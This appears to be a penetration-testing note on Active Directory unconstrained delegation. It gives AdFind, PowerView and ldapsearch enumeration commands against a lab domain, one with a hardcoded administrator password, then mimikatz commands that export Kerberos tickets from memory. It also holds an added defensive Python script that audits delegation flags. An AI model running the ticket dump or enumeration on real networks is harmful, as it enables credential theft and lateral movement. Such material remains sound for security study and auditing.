Unconstrained Delegation, Constrained Delegation, Resource-Based Constrained Delegation
AdFind [switches] [-b basedn] [-f filter] [attr list]
AdFind.exe -b "DC=testdc,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
AdFind.exe -b "DC=testdc,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
Import-Module ./PowerView.ps1;
Get-NetUser -Unconstrained -Domain testdc.com | select name
Get-NetComputer -Unconstrained -Domain testdc.com | select name
ldapsearch -x -H ldap://10.10.10.5:389 -D "CN=administrator,CN=Users,DC=testdc,DC=com" -w 'admin!@45' -b "DC=testdc,DC=com" "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" | grep -iE "distinguishedName"
ldapsearch -x -H ldap://10.10.10.5:389 -D "CN=administrator,CN=Users,DC=testdc,DC=com" -w 'admin!@45' -b "DC=testdc,DC=com" "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" | grep -iE "distinguishedName"
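For auditing, the filters above can be reproduced offline: 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule, 524288 (0x80000) is the TRUSTED_FOR_DELEGATION bit of userAccountControl, and samAccountType 805306368 / 805306369 select user and computer accounts. The Python below is an added example, not code from the original article; it assumes the ldapsearch output was saved without the grep and with the dn, sAMAccountType and userAccountControl attributes requested, and the sample data and review notes are constructed for illustration.

```python
import re

# Values from the filters above, plus one documented userAccountControl flag.
SAM_KIND = {805306368: "user", 805306369: "computer"}  # sAMAccountType
TRUSTED_FOR_DELEGATION = 524288  # 0x80000, the bit the filters test
SERVER_TRUST_ACCOUNT = 8192      # 0x2000, set on domain controllers

def parse_ldif(text):
    """Split plain (non-base64) LDIF into dicts, unfolding continuation lines."""
    text = re.sub(r"\r?\n ", "", text)
    entries = []
    for block in re.split(r"\r?\n\s*\r?\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            if not line.startswith("#") and ": " in line:
                key, value = line.split(": ", 1)
                entry[key.lower()] = value.strip()
        if "dn" in entry:
            entries.append(entry)
    return entries

def audit(text):
    """Return (dn, kind, note) for every account trusted for unconstrained delegation."""
    findings = []
    for e in parse_ldif(text):
        uac = int(e.get("useraccountcontrol", 0))
        if not uac & TRUSTED_FOR_DELEGATION:  # same test as :1.2.840.113556.1.4.803:=524288
            continue
        kind = SAM_KIND.get(int(e.get("samaccounttype", 0)), "other")
        note = ("domain controller, expected" if uac & SERVER_TRUST_ACCOUNT
                else "review: clear the flag or move to constrained delegation")
        findings.append((e["dn"], kind, note))
    return findings

# Constructed sample output, not taken from the page.
SAMPLE = """\
dn: CN=DC01,OU=Domain Controllers,DC=testdc,DC=com
sAMAccountType: 805306369
userAccountControl: 532480

dn: CN=svc-app,CN=Users,DC=testdc,DC=com
sAMAccountType: 805306368
userAccountControl: 524800

dn: CN=alice,CN=Users,DC=testdc,DC=com
sAMAccountType: 805306368
userAccountControl: 512
"""
```

Calling audit(SAMPLE) returns the domain controller and svc-app and skips alice, whose userAccountControl lacks the delegation bit.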
Extracting credentials with mimikatz
privilege::debug;
sekurlsa::tickets /export;
Originally published on the WeChat official account XG小刚: Domain Penetration - Unconstrained Delegation